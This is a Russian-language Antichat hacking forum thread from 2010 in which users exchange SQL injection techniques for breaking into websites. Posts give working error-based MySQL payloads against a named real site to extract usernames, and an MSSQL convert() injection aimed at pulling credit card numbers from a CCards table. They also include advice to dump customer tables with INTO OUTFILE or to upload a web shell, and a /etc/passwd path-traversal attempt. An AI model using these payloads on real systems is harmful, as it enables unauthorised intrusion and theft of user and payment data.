ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12561  
Старый 15.04.2010, 13:00
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию

У меня такой вопрос:

http://www.site.com/email.asp?id=2--&email=asd@asd.co'm

Ответ:
Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e10'

Procedure or Function 'subscribe_email' expects parameter '@email', which was not supplied.
Кто может предположить как код выглядит? Там обращение к функции - но оно идет как asp код или sql?
В приведенном примере двойное тире комментирует поле имейла.

PS А еще интересно, что если я иду по:
http://www.site.com/email.asp?id=2, @email=1--&email=asd@asd.co'm
То поле email принимает указанное мною значение (единица)! И страничка успешно грузится.

Кто-нибудь понимает, что там происходит?

Последний раз редактировалось budden; 15.04.2010 в 17:10..
 
Ответить с цитированием

  #12562  
Старый 15.04.2010, 17:35
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

Цитата:
Сообщение от Ins3t  
Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).
не пашет такое
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
.................что можно провести еще?
 
Ответить с цитированием

  #12563  
Старый 15.04.2010, 17:40
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Цитата:
Сообщение от budden  
[Feldmarschall]
В MSSQL: and(1)=convert(int,@@version)--
O_o причем сдесь это ??
мне что version нужно узнать? ты повнимательней почитай мой пост, прежде чем отвечать то что я сам знаю..


и convert не идет там

Последний раз редактировалось [Feldmarschall]; 15.04.2010 в 17:43..
 
Ответить с цитированием

  #12564  
Старый 15.04.2010, 18:07
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию

Цитата:
Сообщение от [Feldmarschall]  
O_o причем сдесь это ??
мне что version нужно узнать? ты повнимательней почитай мой пост, прежде чем отвечать то что я сам знаю..


и convert не идет там
Я тебе показал, что для вызова ошибки с содержимым запроса можно использовать convert(), вместо @@version можешь подставить свой запрос.

Раз выдается ошибка на твой запрос, можно попробовать привести типы:

1'+or+1=convert(varchar,(select+top+1+CardNumber+f rom+CCards))--
 
Ответить с цитированием

  #12565  
Старый 15.04.2010, 18:23
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

не с convert все также

Последний раз редактировалось [Feldmarschall]; 15.04.2010 в 19:12..
 
Ответить с цитированием

  #12566  
Старый 15.04.2010, 19:23
Deani
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679

Репутация: 3
По умолчанию

подскажите, как через sql inj сделать dump базы ?
 
Ответить с цитированием

  #12567  
Старый 15.04.2010, 20:07
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от Deani  
подскажите, как через sql inj сделать dump базы ?
если есть права у тебя на запись в какую то директорию то можно сдампить структуру бд и данные из таблиц. но блин палево =\ лучше шел залить и там уже все одним файлом сдампить

мануалы читать можешь?

INTO OUTFILE

пример

SELECT * FROM Customers INTO OUTFILE '/home/site/kortinko/dump.txt'

Последний раз редактировалось xcedz; 15.04.2010 в 20:13..
 
Ответить с цитированием

  #12568  
Старый 15.04.2010, 20:39
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

помоqите поjaлуста

Цитата:
http://www.venen-kur.info/index.php?id=1319&lang=-1-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20column_name%20from%20inform ation_schema.columns%20where%20table_name=0x757365 725F7573657273%20limit%201,1),1,64),floor(rand(0)* 2)))
а вот не получается

Цитата:
http://www.venen-kur.info/index.php?id=1319&lang=-1-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20username1%20from%20user_use rs),1,64),floor(rand(0)*2)))

и так тоje
Цитата:
http://www.venen-kur.info/index.php?id=1319&lang=-1-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20username%20from%20user_user s),1,64),floor(rand(0)*2)))

Последний раз редактировалось LokbatanLi; 15.04.2010 в 20:44..
 
Ответить с цитированием

  #12569  
Старый 15.04.2010, 20:43
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
в чем трабл?
 
Ответить с цитированием

  #12570  
Старый 15.04.2010, 20:46
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

и так тоje

Цитата:
http://www.venen-kur.info/index.php?id=1319&lang=-1-1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select username1 from user_users),1,64),floor(rand(0)*2)))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ